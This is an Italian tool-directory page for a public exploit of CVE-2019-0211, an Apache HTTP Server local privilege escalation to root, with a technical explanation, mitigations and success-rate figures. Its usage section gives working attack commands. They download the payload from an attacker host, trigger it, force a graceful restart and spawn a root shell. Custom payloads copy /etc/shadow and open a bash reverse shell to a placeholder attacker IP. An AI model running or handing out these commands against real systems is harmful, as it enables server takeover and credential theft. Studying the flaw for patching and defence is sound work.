Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2019-0211-exploit — Exploit di escalation dei privilegi locale per CVE-2019-0211 che colpisce Apache HTTP Server 2.4.17-2.4.38 con mod_php. Sfrutta un UAF in PHP per corrompere il scoreboard di Apache ed eseguire comandi arbitrari come root tramite un graceful restart. | Kitploit
Strumenti/GitHubGitHub/jeanback1/cve-2019-0211-exploit
Escalation di PrivilegiFramework di ExploitAnalisi delle VulnerabilitàExploitSicurezza WebPenetration TestingApprendimento e FormazioneSviluppo PayloadBinary Exploitation

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHubjeanback1/cve-2019-0211-exploit

CVE-2019-0211-exploit

Exploit di escalation dei privilegi locale per CVE-2019-0211 che colpisce Apache HTTP Server 2.4.17-2.4.38 con mod_php. Sfrutta un UAF in PHP per corrompere il scoreboard di Apache ed eseguire comandi arbitrari come root tramite un graceful restart.

Vedi Repository
2 mesi faNon ancora revisionato

CVE-2019-0211 — Escalata dei Privilegi Locali di Apache HTTP Server (CARPE DIEM)

Descrizione

CVE-2019-0211 è una vulnerabilità di escalation dei privilegi locale che colpisce Apache HTTP Server tra le versioni 2.4.17 e 2.4.38 con mod_prefork e mod_php (o PHP-FPM).

La vulnerabilità consente a un attaccante con una shell come www-data di escalare a root tramite una combinazione di Use-After-Free (UAF) in PHP e corruzione del scoreboard di Apache. Quando Apache esegue un graceful restart (ad esempio, tramite logrotate alle 6:25 AM), esegue child_init() prima di rilasciare i privilegi. Se riusciamo a corrompere il puntatore a questa funzione, possiamo far sì che Apache esegua un comando arbitrario come root.

CVSS 3.1: 7.8 (ALTA) — AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H


Dettagli Tecnici

Meccanismo

Apache utilizza una regione di memoria condivisa chiamata scoreboard dove ogni processo figlio worker ha una struttura process_score con un puntatore bucket a prefork_child_bucket. Questo bucket contiene un apr_proc_mutex_t con puntatori a funzioni (meth->child_init()).

Quando Apache esegue un graceful restart (trigger naturale alle 6:25 AM tramite logrotate), chiama child_init() prima di rilasciare i privilegi. L'exploit:

  1. Provoca un UAF in PHP manipolando oggetti DateInterval e serializzazione JSON
  2. Ottiene una primitiva di lettura/scrittura arbitraria in memoria
  3. Legge /proc/self/maps per localizzare lo scoreboard (SHM in /dev/zero)
  4. Trova la struttura all_buckets nella memoria di Apache
  5. Sovrascrive i bucket con un payload che reindirizza meth->child_init() a system()
  6. Al prossimo restart, Apache esegue il payload come root

Exploit

Autore originale

Charles Fol — @cfreal_

Blogpost originale: CARPE DIEM — CVE-2019-0211 Apache Local Root

Requisiti

  • Apache HTTP Server 2.4.17 – 2.4.38 con mod_php (PHP 7.x)
  • Shell come www-data sul server
  • Capacità di scrivere un file .php in una directory servita da Apache

Utilizzo

root@kitploit:~
# 1. Subir el exploit al servidor vulnerable
# Desde tu máquina atacante:
python3 -m http.server 8080
# En el servidor (como www-data):
cd /var/www/html
wget http://TU_IP:8080/carpediem.php

# 2. Ejecutar el exploit
curl http://localhost/carpediem.php

# 3. Esperar a que Apache haga graceful restart
# Opción A) Esperar a las 6:25 AM (logrotate automático)
# Opción B) Forzar logrotate si tienes permisos:
sudo /usr/sbin/logrotate /etc/logrotate.conf --force

# 4. Verificar que python3.5 ahora es SUID root
ls -la /usr/bin/python3.5
# Output esperado: -rwsr-sr-x 2 root root ...

# 5. Escalar a root
python3.5 -c 'import os; os.setuid(0); os.system("/bin/bash")'

Payload personalizzato

Puoi cambiare il comando che viene eseguito come root usando il parametro cmd:

root@kitploit:~
# Ejemplo: hacer una copia de /etc/shadow
curl "http://localhost/carpediem.php?cmd=cp+/etc/shadow+/tmp/"

# Ejemplo: reverse shell
curl "http://localhost/carpediem.php?cmd=bash+-c+'bash+-i+>%26+/dev/tcp/TU_IP/PUERTO+0>%261'"

Tasso di successo

Più workers = maggiore tasso di successo.


Mitigazione

  • Aggiornare Apache HTTP Server alla versione ≥ 2.4.39
  • Migrare da MPM prefork a MPM event (minore superficie di attacco nello scoreboard)
  • Limitare l'accesso a /proc/self/maps tramite hidef o AppArmor/SELinux

Riferimenti

  • NVD — CVE-2019-0211
  • CARPE DIEM Blogpost — Charles Fol
  • Exploit su GitHub — cfreal/exploits
  • Exploit-DB #46676
  • Avvisi di sicurezza di Apache
Scarica lo strumento
CampoValore
CVECVE-2019-0211
ProdottoApache HTTP Server
Versioni interessate2.4.17 – 2.4.38
TipoLocal Privilege Escalation (CWE-269)
RequisitoShell come www-data, Apache con mod_php, MPM prefork/worker/event
CVSS 3.17.8 ALTA
PatchApache 2.4.39
Workers
Successo
Tentativi
Fallimenti
5 (default)87%17726
889%608
1095%704